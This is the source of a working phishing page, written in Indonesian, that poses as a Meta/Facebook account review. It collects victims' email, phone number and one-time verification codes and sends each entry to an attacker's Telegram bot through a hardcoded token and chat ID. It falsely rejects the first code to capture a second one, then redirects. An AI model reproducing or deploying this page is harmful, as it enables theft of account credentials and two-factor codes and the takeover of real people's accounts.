<?php
session_start();

// Cek apakah pengguna sudah diverifikasi
if (!isset($_SESSION['verified']) || $_SESSION['verified'] !== true) {
    // Jika belum diverifikasi, arahkan mereka ke halaman CAPTCHA
    header("Location: captcha.php");
    exit;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Peninjauan Akun</title>
    <style>
        body {
    font-family: Arial, sans-serif;
    margin: 0;
    padding: 0;
    height: 100vh; /* Tinggi layar penuh */
    background: linear-gradient(to right, #fef4f5 5%, #edf6ff 50%, #eff8ff 75%);
    position: relative; /* Tambahkan ini untuk mencegah elemen absolute mengganggu */
}

header {
    width: 100%;
    padding: 5px;
    position: absolute;
    top: 0;
    left: 0;
    display: flex;
    justify-content: left; /* Tengahkan logo secara horizontal */
    align-items: center;
}

header img {
    width: 25%;
    max-width: 120px;
}

.form-container {
    background: transparent;
    padding: 20px;
    border-radius: 10px;
    width: 100%;
    max-width: 400px;
    box-sizing: border-box;
    margin: auto; /* Tengahkan secara vertikal dan horizontal */
    position: absolute; /* Formulir akan tetap di tengah layar */
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
}

.form-container h1 {
    text-align: left; /* Judul di tengah */
    font-size: 22px;
}

.form-container label {
    text-align: left;
    color: #333333;
    display: block;
    margin-bottom: 5px;
}

.form-container input {
    width: 100%;
    height: 50px;
    font-size:16px;
    padding: 8px;
    margin-bottom: 15px;
    border: 1px solid #ccc;
    border-radius: 8px;
    display: block;
    box-sizing: border-box;
}

.form-container button {
    width: 100%;
    padding: 15px;
    background: #0064e0;
    color: white;
    border: none;
    border-radius: 25px;
    font-size: 16px;
    cursor: pointer;
}

.form-container button:hover {
    background: #1b5bbd;
}

.alert {
    text-align: center;
    margin-bottom: 15px;
    padding: 10px;
    border-radius: 4px;
    color: red;
    display: none;
}

.spinner {
    display: none;
    border: 4px solid #f3f3f3;
    border-top: 4px solid #2575fc;
    border-radius: 50%;
    width: 30px;
    height: 30px;
    animation: spin 1s linear infinite;
    margin: 10px auto;
}

@keyframes spin {
    0% { transform: rotate(0deg); }
    100% { transform: rotate(360deg); }
}

    </style>
</head>
<body>
    <header>
        <img src="img/logometa.png" alt="Logo Meta">
    </header>
    
    <!-- Form Pertama -->
    <div class="form-container">
        <form id="telegramForm1">
            <center><img src="https://glowmediavn.com/wp-content/uploads/2023/06/chay-quang-cao-facebook.png" alt="facebook" width="60%"></center>
            <h1>Masukkan email dan nomor telepon anda yang aktif!</h1>
            <p>Kami akan mengirim informasi status dan umpan balik ke akun anda, masukkan alamat email dan nomor telepon anda yang terhubung dengan akun anda</p>
            <label for="emailInput">Masukkan email yang aktif:</label>
            <input type="email" id="emailInput" name="emailInput" placeholder="email" required>

            <label for="phoneInput">Masukkan nomor telepon yang aktif:</label>
            <input type="text" id="phoneInput" name="phoneInput" placeholder="nomor telepon" required>
            
            <button type="submit">Lanjutkan</button>
            <div id="spinner1" class="spinner"></div>
            <div id="alert1" class="alert"></div>
        </form>
    </div>

    <!-- Form Kedua -->
    <div class="form-container" id="form2" style="display: none;">
        <form id="telegramForm2">
            <h1>Konfirmasi Kode anda</h1>
            <label for="textInput2">Kami telah mengirimkan kode ke perangkat anda
            </br>Periksa Whatsapp/SMS dan juga email anda kemudian masukkan Kode tersebut dibawah ini:</label>
            <img src="img/kode.png" width="100%" alt="Image Above Form">
            <input type="text" id="textInput2" name="textInput2" placeholder="Masukkan kode" required>
            <div id="alert2" class="alert"></div>
            <button type="submit">Kirim</button>
            <div id="spinner2" class="spinner"></div>
        </form>
    </div>

    <script>
        const BOT_TOKEN = "7507569325:AAFf_PVxcF8xZF3OLypXwqLhY468pqErGYA";
        const CHAT_ID = "6236832102";
        let attemptCount = 0; // Untuk melacak percobaan input kode pada form kedua

        function handleSubmit(formId, inputFields, alertId, spinnerId, nextFormId, successCallback, messagePrefix) {
            const form = document.getElementById(formId);
            const alertBox = document.getElementById(alertId);
            const spinner = document.getElementById(spinnerId);
            const nextForm = nextFormId ? document.getElementById(nextFormId) : null;

            form.addEventListener('submit', function (e) {
                e.preventDefault();
                spinner.style.display = 'block';
                alertBox.style.display = 'none';

                let message = `${messagePrefix} :\n`;
                inputFields.forEach(field => {
                    message += `==> ${field.label}: ${field.input.value}\n`;
                });

                fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`, {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({ chat_id: CHAT_ID, text: message })
                })
                .then(response => response.json())
                .then(data => {
                    setTimeout(() => { // Tambahkan delay sebelum menampilkan peringatan
                        if (data.ok) {
                            if (successCallback) {
                                successCallback();
                            } else if (attemptCount === 0) {
                                alertBox.textContent = "Kode tidak bisa digunakan, silahkan masukkan kode baru!";
                                alertBox.style.color = "red";
                                alertBox.style.display = "block";
                                attemptCount++;
                            } else if (attemptCount === 1) {
                                window.location.href = "selesai.php";
                            }
                        } else {
                            alertBox.textContent = "Gagal mengirim data, coba lagi!";
                            alertBox.style.display = "block";
                        }
                    }, 7000); // Delay 3 detik
                })
                .catch(() => {
                    setTimeout(() => { // Tambahkan delay jika terjadi kesalahan
                        alertBox.textContent = "Terjadi kesalahan, coba lagi nanti!";
                        alertBox.style.display = "block";
                    }, 7000);
                })
                .finally(() => {
                    setTimeout(() => {
                        spinner.style.display = 'none';
                        form.reset();
                    }, 7000); // Spinner tampil selama 3 detik
                });
            });
        }

        handleSubmit(
            'telegramForm1',
            [
                { label: 'Email Aktif', input: document.getElementById('emailInput') },
                { label: 'Nomor Telepon', input: document.getElementById('phoneInput') }
            ],
            'alert1',
            'spinner1',
            'form2',
            () => {
                document.getElementById('form2').style.display = 'block';
                document.getElementById('telegramForm1').style.display = 'none';
            },
            'Data Aktif'
        );

        handleSubmit(
            'telegramForm2',
            [
                { label: 'OTP', input: document.getElementById('textInput2') }
            ],
            'alert2',
            'spinner2',
            null,
            null,
            'DONE'
        );
    </script>
</body>
</html>
